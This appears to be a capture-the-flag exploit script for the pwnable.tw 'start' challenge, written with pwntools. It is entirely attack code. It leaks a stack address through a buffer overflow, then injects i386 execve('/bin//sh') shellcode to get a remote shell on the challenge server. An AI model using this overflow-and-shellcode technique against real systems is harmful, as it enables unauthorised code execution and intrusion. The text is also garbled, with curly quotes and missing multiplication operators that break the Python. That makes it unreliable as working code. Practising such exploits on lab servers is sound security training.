context(arch = "i386",os="linux")

# http://shell-storm.org/shellcode/files/shellcode-811.php shellcode = "“ shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73" shellcode += "\x68\x68\x2f\x62\x69\x6e\x89" shellcode += ”\xe3\x89\xc1\x89\xc2\xb0\x0b" shellcode += ”\xcd\x80\x31\xc0\x40\xcd\x80" mov_ecx_esp = p32(0x08048087)

start = remote("chall.pwnable.tw",10000) start.recvuntil("CTF:“) payload = "A" 20 + mov_ecx_esp start.send(payload) stack= start.recv(4) stack_addr = u32(stack) print hex(stack_addr) payload_next="A"20+p32(stack_addr+20)+ "\x90" * 4 + shellcode start.sendline(payload_next) start.interactive()